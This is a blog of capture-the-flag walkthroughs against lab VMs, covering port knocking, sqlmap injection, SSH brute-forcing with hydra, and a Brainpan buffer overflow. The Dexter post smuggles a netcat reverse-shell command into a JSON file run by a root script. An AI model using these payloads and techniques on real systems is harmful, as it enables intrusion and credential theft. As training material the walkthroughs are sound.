Saturday, 13 February 2016

Lord of the root challenge

Hello,
Today I would like to present Lord of the root walkthrough :-)

Port scanning
PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
| ssh-hostkey:
|   1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
|   2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|_  256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
Hmm only 22 is open, so let's try connect via SSH... We have got following banner
[CUT]
Easy as 1,2,3
root@192.168.1.103's password:
For me, it is hint - port knocking 1,2,3. Let's examine the idea.
root@osboxes:~# nmap -p- 192.168.1.103

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-13 11:54 GMT
Nmap scan report for 192.168.1.103
Host is up (0.0014s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
1337/tcp open  waste

MAC Address: 00:0C:29:75:18:08 (VMware)
That's looks good, a little more information
PORT     STATE SERVICE VERSION
1337/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
Browse




























Heh so funny :-) I examined source code and I found that the picture has assigned URL /images/iwilldoit.jpg. Perhaps we can display /robots.txt? Bingo!
Hmm a little strange, because I have got some picture. Maybe in source code will be these information which we are looking for.
<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>
Hmmm probably we should decode the string via base64 decoder.
root@osboxes:~# echo "THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh" | base64 -d
Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!
We are on a good way :-)
root@osboxes:~# echo "Lzk3ODM0NTIxMC9pbmRleC5waHA=" | base64 -d
/978345210/index.php
Great!















You think about SQLi? Unfortunately manual payload does not work. Maybe sqlmap will be powerful in this case?
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp
 The Webapp database may contain credentials.
[1 table]
+-------+
| Users |
+-------+
And dump
Database: Webapp
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password         |
+----+----------+------------------+
| 1  | frodo    | iwilltakethering |
| 2  | smeagol  | MyPreciousR00t   |
| 3  | aragorn  | AndMySword       |
| 4  | legolas  | AndMyBow         |
| 5  | gimli    | AndMyAxe         |
+----+----------+------------------+
Good! I have logged in to the application, using frodo's credrntials.


 Hmmm in general nothing useful. So, I add usernames from above dump to the users.txt file and password to the pass.txt file. I executed brute force attack against SSH port and I have got
[22][ssh] host: 192.168.1.103   login: smeagol   password: MyPreciousR00t
Let's try:

Excellent! We have limited shell :-)
Following command gives us a right way
smeagol@LordOfTheRoot:/var/www/978345210$ find / -perm -4000 -type f
[CUT]
/SECRET/door2/file
/SECRET/door1/file
/SECRET/door3/file
[CUT]
Hm, it looks interesting, ins't it? I have chosen door2 randomly
smeagol@LordOfTheRoot:/SECRET/door2$ ls
file
smeagol@LordOfTheRoot:/SECRET/door2$ file file
file: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=9e50c7cacaf5cc2c78214c81f110c88e61ad0c10, not stripped
In each doors we have the same file. We can see "setuid ELF 32-bit LSB", probably we can try with Buffer Overflow.
smeagol@LordOfTheRoot:/SECRET/door2$ ./file $(python -c "print 'A'*500")
Segmentation fault (core dumped)
So, probably I am right :)
If you don't know how to perform Buffer Overflow via command line, please look at Brain Pa(i)n challenge first.


Tuesday, 9 February 2016

Dexter challenge

 Hi
root@osboxes:~# nmap -sn 192.168.1.0/24

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-04 22:54 GMT

Nmap scan report for 192.168.1.105
Host is up (0.00072s latency).
MAC Address: 00:0C:29:48:F0:B7 (VMware)
Enumeration services
root@osboxes:~# nmap -sV -A 192.168.1.105

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-04 22:54 GMT
Nmap scan report for 192.168.1.105
Host is up (0.0013s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
|   1024 2b:60:6f:53:b8:c9:c8:f4:3b:0e:9b:9e:46:97:b7:55 (DSA)
|   2048 b5:9f:66:ab:f8:5d:a9:3e:51:8a:97:c3:85:10:e3:62 (RSA)
|_  256 e7:bc:52:4f:29:0d:db:21:7e:72:76:2b:dd:ec:12:8e (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          46351/udp  status
|_  100024  1          48991/tcp  status
Let's browse the application









The Panel link rediect us to web form.










SQL Injection does not work in this case :-/ Let's run DirBuster
















My each ideas does not work, our sheet-anchor is some exploit in the internet
Dexter (CasinoLoader) Panel - SQL Injection
Hmmm this exploit looks interesting, is not it? :-) I have read the exploit and execute it:
root@osboxes:~/dexter# python 31686.py dump 192.168.1.105/Panel/gateway.php
User details: [{'password': 'if i had any real talent, i would make money legitimately', 'user': 'loserbotter'}]
Bot details: []
Let;s try log in to the Panel using the credentials :-) Excellent it works!
File Uploader may allow upload our reverse shell exploit.








OK, let's execute our uploaded exploit.











Excellent! We have got limited shell!
So, we are looking for an exploit, because we have pleasure with
www-data@dexter:/var/www$ uname -a
Linux dexter 3.2.0-4-686-pae #1 SMP Debian 3.2.54-2 i686 GNU/Linux
I have not found any effective exploit for our case. I was finding some interesting files and in /var/www we have
www-data@dexter:/var/www$ ls
Panel  antitamper.list    antitamper.py  index.html  tamper.log
antitamper.py and antitamper.list look interesting, isn't it? Let's check privileges these files
-rw-rw-rw-  1 root root  840 Mar 16  2014 antitamper.list
-rw-r--r--  1 root root  278 Mar 16  2014 antitamper.py
Hmmm, we can display content of these files
www-data@dexter:/var/www$ cat antitamper.list
{
    "/var/www/Panel/info.php": "d8fa4356213b6ce9253f55acdff780ac",
    "/var/www/Panel/upload.php" : "b2640cea86e5171662a082b6a043fcc2",
    "/var/www/Panel/style.css": "92f234834a61b7fde898eea40f857bb3",
    "/var/www/Panel/gateway.php": "7b93115195db0c0b085a1107c4cc1aed",
    "/var/www/Panel/pagination.php": "1a8d91c12263dd5298a70c72976c5e97",
    "/var/www/Panel/viewer.php": "292b3b12c2f90c0e557bf599c2475c15",
    "/var/www/Panel/config.php": "421fc13061ab1f343e6607e4ef4f8f42",
    "/var/www/Panel/main.php": "7812b7c1ed608299c9bece4f46607423",
    "/var/www/Panel/load.php": "0f95762562aa97c62d004949e7337e95",
    "/var/www/Panel/viewer_pagination.php": "60c7444a92daa115abfecc73c46fc2ec",
    "/var/www/Panel/master.php": "2b50c51fce89ddcfb769effdeab7080c",
    "/var/www/Panel/index.php": "af44aa507c02f3c1aede5e251b28dc64"
}
Probably it is <file>:<md5(file)>
www-data@dexter:/var/www$ cat antitamper.py

import os
import json

def check():
    with open('/var/www/antitamper.list') as f:
        content = json.loads(f.read())
        for f in content:
            s = "echo '%s  %s' | md5sum -c --status >> /var/www/tamper.log" % (content[f], f)
            os.system(s)
check()
This script verify file integrity. For us this information isn't nice. But we can see that os.system(s) has vulnerability. My idea is: I will copy content of antitamper.list, create new file in my machine and fill in via following content
{
    "root":"'; nc -nv -e /bin/sh 192.168.1.103 4444 #"
    "/var/www/Panel/info.php": "d8fa4356213b6ce9253f55acdff780ac",
    "/var/www/Panel/upload.php" : "b2640cea86e5171662a082b6a043fcc2",
    "/var/www/Panel/style.css": "92f234834a61b7fde898eea40f857bb3",
    "/var/www/Panel/gateway.php": "7b93115195db0c0b085a1107c4cc1aed",
    "/var/www/Panel/pagination.php": "1a8d91c12263dd5298a70c72976c5e97",
    "/var/www/Panel/viewer.php": "292b3b12c2f90c0e557bf599c2475c15",
    "/var/www/Panel/config.php": "421fc13061ab1f343e6607e4ef4f8f42",
    "/var/www/Panel/main.php": "7812b7c1ed608299c9bece4f46607423",
    "/var/www/Panel/load.php": "0f95762562aa97c62d004949e7337e95",
    "/var/www/Panel/viewer_pagination.php": "60c7444a92daa115abfecc73c46fc2ec",
    "/var/www/Panel/master.php": "2b50c51fce89ddcfb769effdeab7080c",
    "/var/www/Panel/index.php": "af44aa507c02f3c1aede5e251b28dc64"
}
I think that, the content is obvious for you. So, we have to upload the file to our victim (in the same way like our reverse shell before).
 and now
www-data@dexter:/var/www$ cat /var/www/Panel/exes/antitamper.list > antitamper.list
I have checked and we have updated antitamper.list file. All what we have to do is to execute antitamper.py script.
We are waiting and...







Game over!

Thursday, 4 February 2016

Bit-Bot challenge

Hi,
Bit-Bot challenge? Why not? Let's get's started!
Nmap scan report for 192.168.1.104
Host is up (0.00068s latency).
MAC Address: 00:0C:29:F8:B4:4E (VMware)
OK, then
root@osboxes:~# nmap -sV -A 192.168.1.104

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-04 13:32 GMT
Nmap scan report for 192.168.1.104
Host is up (0.00075s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
|   1024 e0:dc:be:e9:72:1b:c8:77:40:d2:38:2c:43:c9:b3:49 (DSA)
|   2048 88:e2:0c:77:06:bd:27:5a:14:06:58:c3:d5:41:21:f0 (RSA)
|_  256 73:11:64:71:a6:c0:a3:f1:60:b5:cf:fa:78:42:5a:a0 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          41291/udp  status
|_  100024  1          50153/tcp  status
Nice! Let's check rpcbind
   program version netid     address                service    owner
    100000    4    tcp6      ::.0.111               portmapper superuser
    100000    3    tcp6      ::.0.111               portmapper superuser
    100000    4    udp6      ::.0.111               portmapper superuser
    100000    3    udp6      ::.0.111               portmapper superuser
    100000    4    tcp       0.0.0.0.0.111          portmapper superuser
    100000    3    tcp       0.0.0.0.0.111          portmapper superuser
    100000    2    tcp       0.0.0.0.0.111          portmapper superuser
    100000    4    udp       0.0.0.0.0.111          portmapper superuser
    100000    3    udp       0.0.0.0.0.111          portmapper superuser
    100000    2    udp       0.0.0.0.0.111          portmapper superuser
    100000    4    local     /var/run/rpcbind.sock  portmapper superuser
    100000    3    local     /var/run/rpcbind.sock  portmapper superuser
    100024    1    udp       0.0.0.0.161.75         status     102
    100024    1    tcp       0.0.0.0.195.233        status     102
    100024    1    udp6      ::.180.8               status     102
    100024    1    tcp6      ::.187.192             status     102
Nothing interesting :-) I hope that on port 80 will be sth useful.






But I clicked on the link and...










Grrrr.... So at least we know Apache version. Dirbuster again...















Ow yeah! admin.php looks great!






















SQL Injection does not work on this panel :-( Let's examine source code. Unfortunately does not cotain any sensitive information. Maybe exist some exploit?
Bitbot C2 Panel gate2.php - Multiple Vulnerabilities
OK! From the exploit now, we know that hwid parameter in gate2.php is vulnerable to SQLi. So,
root@osboxes:~/bitbot# sqlmap -u "http://192.168.1.104/gate2.php?connection=0&hwid=1" -p hwid --level 5 --risk 3 --dbs

available databases [6]:                                                                                                                            
[*] bitbot
[*] information_schema
[*] mysql
[*] performance_schema
[*] roottext
[*] test
We are looking for some credentials...
Database: bitbot
Table: mining_configs
[2 entries]
+-------+------+-----------------+------+---------+---------+----------+-----------------+---------+
| botid | mode | pass            | port | pool    | proxy   | params   | user            | threads |
+-------+------+-----------------+------+---------+---------+----------+-----------------+---------+
| all   | agr  | worker password | port | poolurl | <blank> |  -g yes  | worker username | default |
| all   | idle | worker password | port | poolurl | <blank> |  -g no   | worker username | default |
+-------+------+-----------------+------+---------+---------+----------+-----------------+---------+
Let's try log in into BitBot with the credentials. Unfortunately it doesn't work.
We have retrieved  source code of config.php via SQL Injection
<?php
//Timezone
date_default_timezone_set('Europe/London'); // VISIT http://www.php.net/manual/en/timezones.php For list of timezones
//Admin Configs
$ADMIN_USER_NAME     = 'botter'; //panel username
$ADMIN_PASSWORD     = 'IF I CAME UP WITH UNIQUE PASSWORDS, I WOULD BE HOME BY NOW'; //panel password
//SQL Configs
$SQL_HOST        = 'localhost'; //db host
$SQL_USER_NAME     = 'root'; //db user
$SQL_PASSWORD    = 'THIS PASSWORD WILL NOT HELP YOU'; //db pass
$SQL_DATABASE    = 'bitbot'; //db name
$SQL_CONNECTION    = @mysql_connect($SQL_HOST,$SQL_USER_NAME,$SQL_PASSWORD);
//Panel Configs
$BOT_PAGE_MAX    = '50';
//Mining Configs
$JSONurl = ''; //follow readme
$apitoken = ''; //follow readme
$apihash = 'hashrate'; //follow readme
$crypto = 'btc'; //btc or ltc
////////////////Do Not Edit Beyond This Point///////////////////////////////////////////
$BOT_CHECKIN_INTERVAL = '60';  //seconds
$CMD_SPLIT         = '<\\\\\>';
$CMD_DOWNLOAD    = 'DOWN';
$CMD_UPDATE        = 'UPDATE';
$CMD_VISIT_SITE     = 'VISIT';
$CMD_REMOVE        = 'REMOVE';
$CMD_DDOS_STOP    = 'STOP';
$CMD_BTC = 'MINE';
$CMD_STOPBTC = 'STOPMINE';
?>
Wonderful! We have a lot of credentials (only two :P)! I am inside!


 Interesting! But I didn't find fat chance to upload reverse shell. Let's try authenticate via the credentials by SSH.
















Great! We have limited shell! Let's check what is bot.py from /index.php page.
botter@Bitbot:~$ cd /var/www/bot/
botter@Bitbot:/var/www/bot$ ls -la
total 12
drwxr--r-- 2 botter root 4096 Aug 21  2013 .
drwxr-xr-x 6 root   root 4096 Aug 11  2013 ..
-rw-r--r-- 1 botter root 2418 Aug 11  2013 bot.py
We are allowed to read and write this file. Hmm I am too weak to do something useful from the file.
Let's look, what we have in our /home directory
botter@Bitbot:~$ cat gen.sh
ifconfig eth0 | grep inet | grep -v inet6 | awk '{print $2substr(rand(),0,5);}' | awk '{print $0"\n"$0}' | passwd
Hm, we can read and understand bash code, Let's try
root@osboxes:~/bitbot# python -c 'for i in range(100): print "addr:192.168.1.1040."+str(i)' > passwd.txt
root@osboxes:~/bitbot# hydra -l root -P passwd.txt ssh://192.168.1.104 -f -e nsr
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-04 15:13:27
[DATA] 16 tasks, 1 server, 103 login tries (l:1/p:103), ~6 tries per task
[DATA] attacking service ssh on port 22
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[22][ssh] host: 192.168.1.104   login: root   password: addr:192.168.1.1040.54
[STATUS] attack finished for 192.168.1.104 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Great! We are a heroes!














 Game over!

Wednesday, 3 February 2016

Acid reloaded challenge

Hi.
Today is time for Acid Reloaded challenge.
root@osboxes:~# nmap -sn 192.168.1.0/24

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 12:30 GMT
(..)
Nmap scan report for 192.168.1.102
Host is up (0.00071s latency).
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
(...)
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.67 seconds
Enumeration services ...
root@osboxes:~# nmap -sV -A 192.168.1.102

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 12:32 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00085s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.47%I=7%D=2/3%Time=56B1F361%P=i686-pc-linux-gnu%r(NULL,29
SF:,"SSH-2\.0-OpenSSH_6\.7p1\x20Ubuntu-5ubuntu1\.3\r\n");
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Network Distance: 1 hop
Hmmm... Port 22 open only? This is a little strange...
root@osboxes:~# nmap -p- 192.168.1.102

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 12:35 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00054s latency).
Not shown: 65533 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
33447/tcp filtered unknown

MAC Address: 00:0C:29:BB:6E:B3 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.54 seconds
OK, let's try connect to port 22.

















Oh! We can see that out target implement "Port Knocking", let's knock the ports!
root@osboxes:~# nmap -Pn --host_timeout 201 --max-retries 0  -p 3 192.168.1.102
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 15:20 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00091s latency).
PORT  STATE  SERVICE
3/tcp closed compressnet
MAC Address: 00:0C:29:BB:6E:B3 (VMware)

root@osboxes:~# nmap -Pn --host_timeout 201 --max-retries 0  -p 2 192.168.1.102

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 15:21 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00096s latency).
PORT  STATE  SERVICE
2/tcp closed compressnet
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
root@osboxes:~# nmap -Pn --host_timeout 201 --max-retries 0  -p 1 192.168.1.102

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 15:21 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00099s latency).
PORT  STATE  SERVICE
1/tcp closed tcpmux
MAC Address: 00:0C:29:BB:6E:B3 (VMware)

root@osboxes:~# nmap -Pn --host_timeout 201 --max-retries 0  -p 33447 192.168.1.102

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 15:21 GMT
Nmap scan report for 192.168.1.102
Host is up (0.0025s latency).
PORT      STATE SERVICE
33447/tcp open  unknown
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
Amazing! Port 33447 is open! Good idea, will be check what kind of service is running on 33447 port.
PORT      STATE SERVICE VERSION
33447/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
We areable to browse the application via our browser



The default page is encouraging us to be creative :-) Let's execute dirbuster

bin directory looks interesting. We have response of http://192.168.1.102/bin request below.


As far as I know, this web form is resistant SQL Injection attack, so go deeper.

In our application /bin/dashboard.php looks promising.

Hmmm, let' go back to /bin/index.php and intercept traffic.


We can see that our credentials are validated in /bin/includes/validation.php. We have discovered also dashboard.php file, which is a page after validation. We have to force successful validation. Let's reload our dashboard.php and we will try deceive out application that we have been successfully authenticated.


And result:


Let's click on "Click" link. We have been redirected to 
http://192.168.1.105:33447/bin/l33t_haxor.php
We noticed that source code contains information that l33t_haxor.php uses id numeric parameter.
 My sqlmap attemptios is fail, but I want to try harder, because maybe the application implement WAF, so
sqlmap -u "http://192.168.1.105:33447/bin/l33t_haxor.php?id=1*%22" --dbms=mysql --threads=10 -p id --batch --tamper=space2comment,space2dash,space2hash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank

(...)

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
Excellent! Let's find some credentials (if exists)
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] secure_login
 Tables
Database: secure_login
[4 tables]
+--------------------+
| UB3R/strcpy.exe|
| login_attempts    |
| members             |
| word                    |
+--------------------+
 I didn't find any interesting information from secure_login database :( But UB3R/strcpy.exe looks a little strange. Let's examine
http://192.168.1.105:33447/UB3R/strcpy.exe
I have downloaded strcpy.exe file to my machine.
root@osboxes:~/Downloads# file strcpy.exe
strcpy.exe: PDF document, version 1.5
We are happy, because



This file contains only this image? I don't believe that, we should examine the file deeper
root@osboxes:~/Downloads# strings strcpy.pdf

(...)

acid.txt
You are at right track.
Don't loose hope..
Good Luck :-)
Kind & Best Regards,
Acid
lol.jpg

(...)
OK, at least we know that we are at right track :-)
root@osboxes:~/Downloads# mv strcpy.pdf strcpy.rar
root@osboxes:~/Downloads# unrar e strcpy.rar

UNRAR 4.10 freeware      Copyright (c) 1993-2012 Alexander Roshal

Extracting from strcpy.rar

Extracting  acid.txt                                                  OK
Extracting  lol.jpg                                                   OK
All OK
And
root@osboxes:~/Downloads# cat acid.txt
You are at right track.

Don't loose hope..

Good Luck :-)

Kind & Best Regards,
 Maybe lol.jpg will be helpful

Hmmm, maybe something useful is hardcodened on the picture.
root@osboxes:~/Downloads# strings lol.jpg

(...)

hint.txt
`You have found a contact. Now, go and grab the details :-)
So, let's try similar technique like with our PDF file.
root@osboxes:~/Downloads# mv lol.jpg lol.rar
root@osboxes:~/Downloads# unrar e lol.rar

UNRAR 4.10 freeware      Copyright (c) 1993-2012 Alexander Roshal

Extracting from lol.rar

Extracting  Avinash.contact                                           OK
Extracting  hint.txt                                                  OK
All OK

root@osboxes:~/Downloads# cat hint.txt
You have found a contact. Now, go and grab the details :-)

root@osboxes:~/Downloads# cat Avinash.contact
<?xml version="1.0" encoding="UTF-8"?>
<c:contact c:Version="1" xmlns:c="http://schemas.microsoft.com/Contact" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:MSP2P="http://schemas.microsoft.com/Contact/Extended/MSP2P" xmlns:MSWABMAPI="http://schemas.microsoft.com/Contact/Extended/MSWABMAPI">
    <c:CreationDate>2015-08-23T11:39:18Z</c:CreationDate><c:Extended><MSWABMAPI:PropTag0x3A58101F c:ContentType="binary/x-ms-wab-mapi" c:type="binary">AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=</MSWABMAPI:PropTag0x3A58101F></c:Extended>
    <c:ContactIDCollection><c:ContactID c:ElementID="599ef753-f77f-4224-8700-e551bdc2bb1e"><c:Value>0bcf610e-a7be-4f26-9042-d6b3c22c9863</c:Value></c:ContactID></c:ContactIDCollection><c:EmailAddressCollection><c:EmailAddress c:ElementID="0745ffd4-ef0a-4c4f-b1b6-0ea38c65254e"><c:Type>SMTP</c:Type><c:Address>acid.exploit@gmail.com</c:Address><c:LabelCollection><c:Label>Preferred</c:Label></c:LabelCollection></c:EmailAddress><c:EmailAddress c:ElementID="594eec25-47bd-4290-bd96-a17448f7596a" xsi:nil="true"/></c:EmailAddressCollection><c:NameCollection><c:Name c:ElementID="318f9ce5-7a08-4ea0-8b6a-2ce3e9829ff2"><c:FormattedName>Avinash</c:FormattedName><c:GivenName>Avinash</c:GivenName></c:Name></c:NameCollection><c:PersonCollection><c:Person c:ElementID="865f9eda-796e-451a-92b1-bf8ee2172134"><c:FormattedName>Makke</c:FormattedName><c:LabelCollection><c:Label>wab:Spouse</c:Label></c:LabelCollection></c:Person></c:PersonCollection><c:PhotoCollection><c:Photo c:ElementID="2fb5b981-cec1-45d0-ae61-7c340cfb3d72"><c:LabelCollection><c:Label>UserTile</c:Label></c:LabelCollection></c:Photo></c:PhotoCollection></c:contact>
The string AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA= looks like somethong encoded via base64. Let's try decode
root@osboxes:~/Downloads# echo "AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=" | base64 -d
This command gives us something like NooB@123. This string may be a password and Avinash and Makke may be a username.
Unfortunately Avinash with NooB@123 is not a valid credential. So let's try makke and voila!

 We have got
makke@acid:~$ cat .bash_history
exit
cd ..
clear
cd /
ls
cd bin/
clear
./overlayfs
clear
cd /home/makke/
clear
nano .hint
clear
ls
clear
ls
ls -a
cat .hint
clear
cd /bin/
ls
./overlayfs
clear
wgt
wget
apt-get remove wget
su
su -
exit
Let's mmove our location to /bin/ and....


Wow, we have got root! This was not as hard as I though :-)


Tuesday, 2 February 2016

Brain Pa(i)n

Now it's time for a little Buffer Overflow.

root@osboxes:~# nmap -sn 192.168.1.0/24

Nmap scan report for 192.168.1.110
Host is up (0.00039s latency).
MAC Address: 00:0C:29:10:01:C0 (VMware)
Now enumeration services...
root@osboxes:~# nmap -sV 192.168.1.110

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-01 20:23 GMT
Nmap scan report for 192.168.1.110
Host is up (0.0014s latency).
Not shown: 998 closed ports
PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port9999-TCP:V=6.47%I=7%D=2/1%Time=56AFBED7%P=i686-pc-linux-gnu%r(NULL,
SF:298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\x2
SF:0\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20
SF:\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x20\
SF:x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\
SF:x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\
SF:x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\x2
SF:0\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_
SF:\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_
SF:\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x20\
SF:x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\|\
SF:x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x20_
SF:\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x20_
SF:________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x20T
SF:HE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20>>\x20");
MAC Address: 00:0C:29:10:01:C0 (VMware)
Let's browse the web application
























Only trash information :-) Now turn to dirbuster (as always).









Oh! In bin directory may be some binary file?
http://192.168.1.110:10000/bin/













I think that we should run our Windows 32-bit VM and download brainpan.exe on it. Probably brainpan.exe is running on our target on 9999 port.
I am pretty sure that it will be good idea when we run brainpan.exe via Immunity Debugger.

Our Windows VM has 191.168.1.101 IP address. We have to click twice on Start button.

My own fuzzer













Result:













We know that for us the Stack has three addresses EAX, EIP and ESP. We have to find where is located EIP. We verified that 900 A's cause overflow. We have overwritten via 4x"A", so
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_create.rb 900
and we have to edit our script using output from above command. Executing our script we have got following result:

 We can see, that EIP has been overwritten via 35724134
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_offset.rb 35724134
[*] Exact match at offset 524
Great! Now our payload will be as follow "A"*524 + "B"*4 + (900-524-4)*"C". Updated script gives following result:













Excellent! We know where we should set up JMP ESP address and where our shellcode.
root@osboxes:/usr/share/metasploit-framework/tools# ./nasm_shell.rb
nasm > jmp esp
00000000  FFE4              jmp esp



                                                                                                
OK! We also found module without ASLR protection.

!mona find -s "\xff\xe4" -m brainpan.exe
Now, we find our JMP ESP address - 311712F3
So, our payload will be as follow: "A"*524+"\xf3\x12\x17\x31"+(900-524-4)*"C".
We have to also check "bad characters", let's generate all possible hex values.
root@osboxes:~/brainpan1# cat hex.py
dict = "abcdef0123456789"

for i in dict:
 for j in dict:
  print "\\x"+i+j
